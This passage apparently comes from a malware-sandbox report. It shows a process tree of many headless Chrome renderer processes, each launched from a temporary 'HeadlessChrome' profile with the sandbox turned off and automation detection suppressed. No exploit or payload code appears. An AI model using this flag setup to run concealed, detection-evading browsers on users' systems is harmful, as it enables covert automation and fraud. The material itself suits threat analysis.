                                                                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-agent="Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.72.93 Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\Temp\HeadlessChrome6492240707625" --enable-dinosaur-easter-egg-alt-images --no-sandbox --disable-databases --disable-gpu-compositing --disable-blink-features=AutomationControlled --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=2852,i,5124931169395430665,17416238259355112462,262144 --enable-features=Plugins --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4556 /prefetch:1
                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                            PID:4428
                                                                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-agent="Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.72.93 Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\Temp\HeadlessChrome6492240707625" --enable-dinosaur-easter-egg-alt-images --no-sandbox --disable-databases --disable-gpu-compositing --disable-blink-features=AutomationControlled --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=4584,i,5124931169395430665,17416238259355112462,262144 --enable-features=Plugins --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4580 /prefetch:1
                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                              PID:5536
                                                                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-sandbox --string-annotations --noerrdialogs --user-agent="Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.72.93 Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\Temp\HeadlessChrome6492240707625" --field-trial-handle=4816,i,5124931169395430665,17416238259355112462,262144 --enable-features=Plugins --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4820 /prefetch:8
                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                PID:2084
                                                                                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-agent="Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.72.93 Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\Temp\HeadlessChrome6492240707625" --enable-dinosaur-easter-egg-alt-images --no-sandbox --disable-gpu-compositing --disable-blink-features=AutomationControlled --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --field-trial-handle=5080,i,5124931169395430665,17416238259355112462,262144 --enable-features=Plugins --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=5096 /prefetch:1
                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                  PID:2988
                                                                                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-agent="Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.72.93 Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\Temp\HeadlessChrome6492240707625" --enable-dinosaur-easter-egg-alt-images --no-sandbox --disable-gpu-compositing --disable-blink-features=AutomationControlled --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --field-trial-handle=5032,i,5124931169395430665,17416238259355112462,262144 --enable-features=Plugins --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=5048 /prefetch:1
                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                    PID:6628
                                                                                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-agent="Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.72.93 Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\Temp\HeadlessChrome6492240707625" --enable-dinosaur-easter-egg-alt-images --no-sandbox --disable-gpu-compositing --disable-blink-features=AutomationControlled --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --field-trial-handle=5008,i,5124931169395430665,17416238259355112462,262144 --enable-features=Plugins --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4592 /prefetch:1
                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                      PID:4228
                                                                                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-agent="Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.72.93 Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\Temp\HeadlessChrome6492240707625" --enable-dinosaur-easter-egg-alt-images --no-sandbox --disable-gpu-compositing --disable-blink-features=AutomationControlled --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --field-trial-handle=3576,i,5124931169395430665,17416238259355112462,262144 --enable-features=Plugins --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4984 /prefetch:1
                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                        PID:5772
                                                                                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-agent="Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.72.93 Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\Temp\HeadlessChrome6492240707625" --enable-dinosaur-easter-egg-alt-images --no-sandbox --disable-gpu-compositing --disable-blink-features=AutomationControlled --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --field-trial-handle=5048,i,5124931169395430665,17416238259355112462,262144 --enable-features=Plugins --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3012 /prefetch:1
                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                          PID:7460
                                                                                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-agent="Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.72.93 Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\Temp\HeadlessChrome6492240707625" --enable-dinosaur-easter-egg-alt-images --no-sandbox --disable-gpu-compositing --disable-blink-features=AutomationControlled --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --field-trial-handle=3564,i,5124931169395430665,17416238259355112462,262144 --enable-features=Plugins --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4796 /prefetch:1
                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                            PID:5940
                                                                                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-agent="Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.72.93 Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\Temp\HeadlessChrome6492240707625" --enable-dinosaur-easter-egg-alt-images --no-sandbox --disable-gpu-compositing --disable-blink-features=AutomationControlled --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --field-trial-handle=5076,i,5124931169395430665,17416238259355112462,262144 --enable-features=Plugins --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4820 /prefetch:1
                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                              PID:7688
                                                                                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-agent="Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.72.93 Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\Temp\HeadlessChrome6492240707625" --enable-dinosaur-easter-egg-alt-images --no-sandbox --disable-gpu-compositing --disable-blink-features=AutomationControlled --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --field-trial-handle=5100,i,5124931169395430665,17416238259355112462,262144 --enable-features=Plugins --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4980 /prefetch:1
                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                                PID:836
                                                                                                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-agent="Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.72.93 Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\Temp\HeadlessChrome6492240707625" --enable-dinosaur-easter-egg-alt-images --no-sandbox --disable-databases --disable-gpu-compositing --disable-blink-features=AutomationControlled --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --field-trial-handle=4796,i,5124931169395430665,17416238259355112462,262144 --enable-features=Plugins --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2896 /prefetch:1
                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                  PID:3508
                                                                                                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-agent="Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.72.93 Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\Temp\HeadlessChrome6492240707625" --enable-dinosaur-easter-egg-alt-images --no-sandbox --disable-databases --disable-gpu-compositing --disable-blink-features=AutomationControlled --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --field-trial-handle=3012,i,5124931169395430665,17416238259355112462,262144 --enable-features=Plugins --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2980 /prefetch:1
                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                    PID:624
                                                                                                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-agent="Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.72.93 Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\Temp\HeadlessChrome6492240707625" --enable-dinosaur-easter-egg-alt-images --no-sandbox --disable-databases --disable-gpu-compositing --disable-blink-features=AutomationControlled --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --field-trial-handle=5132,i,5124931169395430665,17416238259355112462,262144 --enable-features=Plugins --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4976 /prefetch:1
                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                      PID:7012
                                                                                                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-agent="Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.72.93 Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\Temp\HeadlessChrome6492240707625" --enable-dinosaur-easter-egg-alt-images --no-sandbox --disable-databases --disable-gpu-compositing --disable-blink-features=AutomationControlled --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --field-trial-handle=5236,i,5124931169395430665,17416238259355112462,262144 --enable-features=Plugins --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4888 /prefetch:1
                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                        PID:6200
                                                                                                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-agent="Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.72.93 Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\Temp\HeadlessChrome6492240707625" --enable-dinosaur-easter-egg-alt-images --no-sandbox --disable-databases --disable-gpu-compositing --disable-blink-features=AutomationControlled --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --field-trial-handle=4900,i,5124931169395430665,17416238259355112462,262144 --enable-features=Plugins --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4932 /prefetch:1
                                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                                          PID:6180
                                                                                                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-agent="Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.72.93 Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\Temp\HeadlessChrome6492240707625" --enable-dinosaur-easter-egg-alt-images --no-sandbox --disable-databases --disable-gpu-compositing --disable-blink-features=AutomationControlled --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --field-trial-handle=3224,i,5124931169395430665,17416238259355112462,262144 --enable-features=Plugins --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=5148 /prefetch:1
                                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                                            PID:7960
                                                                                                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-agent="Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.72.93 Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\Temp\HeadlessChrome6492240707625" --enable-dinosaur-easter-egg-alt-images --no-sandbox --disable-databases --disable-gpu-compositing --disable-blink-features=AutomationControlled --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --field-trial-handle=4036,i,5124931169395430665,17416238259355112462,262144 --enable-features=Plugins --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4056 /prefetch:1
                                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                                              PID:4508
                                                                                                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-agent="Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.72.93 Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\Temp\HeadlessChrome6492240707625" --enable-dinosaur-easter-egg-alt-images --no-sandbox --disable-databases --disable-gpu-compositing --disable-blink-features=AutomationControlled --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --field-trial-handle=4004,i,5124931169395430665,17416238259355112462,262144 --enable-features=Plugins --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4080 /prefetch:1
                                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                                                PID:6240
                                                                                                                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-agent="Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.72.93 Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\Temp\HeadlessChrome6492240707625" --enable-dinosaur-easter-egg-alt-images --no-sandbox --disable-databases --disable-gpu-compositing --disable-blink-features=AutomationControlled --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --field-trial-handle=4596,i,5124931169395430665,17416238259355112462,262144 --enable-features=Plugins --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4012 /prefetch:1
                                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                                  PID:7284
                                                                                                                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-agent="Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.72.93 Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\Temp\HeadlessChrome6492240707625" --enable-dinosaur-easter-egg-alt-images --no-sandbox --disable-databases --disable-gpu-compositing --disable-blink-features=AutomationControlled --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --field-trial-handle=4896,i,5124931169395430665,17416238259355112462,262144 --enable-features=Plugins --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3988 /prefetch:1
                                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                                    PID:7348
                                                                                                                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-agent="Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.72.93 Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\Temp\HeadlessChrome6492240707625" --enable-dinosaur-easter-egg-alt-images --no-sandbox --disable-databases --disable-gpu-compositing --disable-blink-features=AutomationControlled --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --field-trial-handle=5164,i,5124931169395430665,17416238259355112462,262144 --enable-features=Plugins --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4912 /prefetch:1
                                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                                      PID:5772
                                                                                                                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-agent="Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.72.93 Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\Temp\HeadlessChrome6492240707625" --enable-dinosaur-easter-egg-alt-images --no-sandbox --disable-databases --disable-gpu-compositing --disable-blink-features=AutomationControlled --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --field-trial-handle=5172,i,5124931169395430665,17416238259355112462,262144 --enable-features=Plugins --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4964 /prefetch:1
                                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                                        PID:4808
                                                                                                                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-agent="Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.72.93 Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\Temp\HeadlessChrome6492240707625" --enable-dinosaur-easter-egg-alt-images --no-sandbox --disable-databases --disable-gpu-compositing --disable-blink-features=AutomationControlled --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --field-trial-handle=4956,i,5124931169395430665,17416238259355112462,262144 --enable-features=Plugins --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=5188 /prefetch:1
                                                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                                                          PID:2256
                                                                                                                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-agent="Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.72.93 Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\Temp\HeadlessChrome6492240707625" --enable-dinosaur-easter-egg-alt-images --no-sandbox --disable-databases --disable-gpu-compositing --disable-blink-features=AutomationControlled --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --field-trial-handle=5160,i,5124931169395430665,17416238259355112462,262144 --enable-features=Plugins --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=5204 /prefetch:1
                                                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                                                            PID:4676
                                                                                                                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-agent="Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.72.93 Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\Temp\HeadlessChrome6492240707625" --enable-dinosaur-easter-egg-alt-images --no-sandbox --disable-databases --disable-gpu-compositing --disable-blink-features=AutomationControlled --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --field-trial-handle=5152,i,5124931169395430665,17416238259355112462,262144 --enable-features=Plugins --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=5232 /prefetch:1
                                                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                                                              PID:8080
                                                                                                                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-agent="Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.72.93 Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\Temp\HeadlessChrome6492240707625" --enable-dinosaur-easter-egg-alt-images --no-sandbox --disable-databases --disable-gpu-compositing --disable-blink-features=AutomationControlled --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --field-trial-handle=5180,i,5124931169395430665,17416238259355112462,262144 --enable-features=Plugins --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4588 /prefetch:1
                                                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                                                                PID:7556
                                                                                                                                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-agent="Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.72.93 Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\Temp\HeadlessChrome6492240707625" --enable-dinosaur-easter-egg-alt-images --no-sandbox --disable-databases --disable-gpu-compositing --disable-blink-features=AutomationControlled --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --field-trial-handle=3020,i,5124931169395430665,17416238259355112462,262144 --enable-features=Plugins --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3516 /prefetch:1
                                                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                                                  PID:6308
                                                                                                                                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-agent="Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.72.93 Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\Temp\HeadlessChrome6492240707625" --enable-dinosaur-easter-egg-alt-images --no-sandbox --disable-databases --disable-gpu-compositing --disable-blink-features=AutomationControlled --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --field-trial-handle=4000,i,5124931169395430665,17416238259355112462,262144 --enable-features=Plugins --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4968 /prefetch:1
                                                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                                                    PID:3044
                                                                                                                                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-agent="Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.72.93 Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\Temp\HeadlessChrome6492240707625" --enable-dinosaur-easter-egg-alt-images --no-sandbox --disable-databases --disable-gpu-compositing --disable-blink-features=AutomationControlled --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --field-trial-handle=4048,i,5124931169395430665,17416238259355112462,262144 --enable-features=Plugins --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3956 /prefetch:1
                                                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                                                      PID:7736
                                                                                                                                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-agent="Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.72.93 Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\Temp\HeadlessChrome6492240707625" --enable-dinosaur-easter-egg-alt-images --no-sandbox --disable-databases --disable-gpu-compositing --disable-blink-features=AutomationControlled --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --field-trial-handle=3608,i,5124931169395430665,17416238259355112462,262144 --enable-features=Plugins --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3984 /prefetch:1
                                                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                                                        PID:6364
                                                                                                                                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
